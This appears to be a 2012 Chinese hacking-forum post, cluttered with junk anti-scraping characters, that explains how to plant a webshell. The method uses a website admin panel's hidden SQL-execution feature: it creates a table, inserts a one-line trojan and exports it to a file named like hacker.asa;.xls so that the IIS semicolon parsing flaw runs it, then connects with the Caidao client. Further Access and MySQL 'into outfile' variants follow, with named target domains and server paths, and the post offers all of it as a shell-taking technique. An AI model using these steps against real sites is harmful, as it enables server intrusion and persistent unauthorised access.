好不容易进了后台,发现啥上传啊。备份啊多木有。
% H7 F8 e* M3 r* twebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
* v4 |4 l1 `; I! p6 J* I文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,' N+ [+ a# @; L
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下: o3 Z' y8 z& v
1.create table cmd (a varchar(50))9 S' ~: d# U: q& Q( r
2.insert into cmd (a) values (‘‘)
" [9 Y' B! l; g) U9 I3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
9 K: i! z! S/ E/ T1 j6 Z(把表cmd的内容导出为物理路径的一个EXCEL文件)4 U* U; x3 }; h' V. H2 {) f# {) }. @
4.drop table cmd, k, p* w, E& g4 J$ z
利用IIS的BUG成功拿到了WEBSHELL。
6 v0 D- [0 g- O8 n% W/ o0 i, Z6 \
+ O8 k2 W0 N7 E' @) K5 R直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话 e& S% B9 c( H1 Q3 ?+ t$ G& q0 [
/ W7 X4 P; R; J: T$ H' { SQL语句意思解释:
% n; q' `/ A1 M9 c- O7 f 第一句
2 Z" X+ B1 P& T1 n/ w! E' y 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50$ \+ s; e4 _* j' p
* T: q1 F3 ?5 g* F2 R6 b/ P( @
第二句7 c: W' l) q# [
在表cmd的a字段插入一句话木马. M7 d. P- t6 f* p. B# X# R
第三句5 m3 V" K1 w7 ~9 U4 u
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
3 Y5 f o% q6 X2 o! H( `4 f: U* X/ \& B. ]6 V5 }1 f: ^
第四句
3 h" k2 g! _! c/ U 删除建立的cmd表2 m, K: t+ c+ Y& {
) V4 S+ c8 d. I$ ], E1 R
以下内容为测试:* K7 w$ K+ a" u# x6 G& F' X" p/ |
Access利用后台SQL执行命令功能导出WebShell:7 N0 O$ v, ], G: W- `
这个更简单: U$ X1 i- y5 d" I! ^
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]1 r! D- y& t$ r3 x+ E& L
或者6 W1 d! h7 i1 ~, ?* L
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
7 ^2 ]( s2 C$ \ x% U/ o/ Z
, s$ |5 V, Q. Q/ d5 M 后台有执行SQL语句功能(vote为已知表段)
7 Y0 v: n ^" i; @ 希望对大家有所帮助拿shell的又一个思路" |- n, R$ ]$ ^5 |; t$ `
|
发表于 2012-9-13 17:53:58
收藏
支持
反对